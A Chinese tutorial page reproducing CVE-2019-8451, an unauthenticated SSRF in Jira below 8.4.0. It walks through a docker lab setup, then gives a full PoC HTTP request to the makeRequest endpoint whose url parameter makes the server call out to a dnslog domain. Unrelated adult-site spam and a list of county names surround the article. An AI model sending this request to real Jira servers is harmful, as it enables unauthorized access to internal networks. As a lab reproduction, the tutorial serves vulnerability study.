中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

發布時間:2021-12-10 15:38:49 來源:億速云 閱讀:341 作者:柒染 欄目:大數據

這期內容當中小編將會給大家帶來有關Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

0x00 簡介


JIRA是Atlassian公司出品的項目與事務跟蹤工具,被廣泛應用于缺陷跟蹤、客戶服務、需求收集、流程審批、任務跟蹤、項目跟蹤和敏捷管理等工作領域。

0x01 漏洞概述


Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞,原因在于JiraWhitelist這個類的邏輯缺陷,成功利用此漏洞的遠程攻擊者可以以Jira服務端的身份訪問內網資源。經分析,此漏洞無需任何憑據即可觸發。(來自奇安信CERT)

0x02 影響范圍


Jira < 8.4.0

0x03 環境搭建


在線靶場

開放時間(當前-9月29日20:00)

獲取方式(完成任意一個):

1、將本文轉發至朋友圈并配文字,截圖發至公眾號內

2、聯系作者,五元紅包

自行搭建

使用docker進行搭建,執行以下命令開啟環境

docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

訪問ip:8080進行安裝

下圖選擇第二個

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

繼續即可

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

點擊next,后面漏了兩張圖

去生成JIRA使用許可證

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

生成之后找到License Key,回到頁面填上License Key繼續安裝

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

至此,安裝完畢。

0x04 漏洞利用


先訪問ip:8080,然后刷新抓包

將數據包替換為如下Poc:

GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2

其中ip替換為目標ip,共三處

@后面改為你的dnslog的地址

repeater發包

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

去dnslog中刷新查看結果,可以看到有流量經過

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

如果訪問未開放端口,結果是這樣的:

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

上述就是小編為大家分享的Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

蒲城县| 郁南县| 炉霍县| 剑川县| 渝北区| 阳新县| 长泰县| 图片| 麻江县| 佛山市| 临猗县| 行唐县| 冕宁县| 集贤县| 五指山市| 江陵县| 个旧市| 星座| 彭泽县| 华蓥市| 夏河县| 抚顺县| 灌阳县| 涪陵区| 民权县| 阳新县| 许昌市| 宿州市| 宁武县| 阿勒泰市| 西乡县| 册亨县| 无为县| 磴口县| 木里| 措美县| 卢氏县| 万荣县| 梁平县| 社旗县| 石景山区|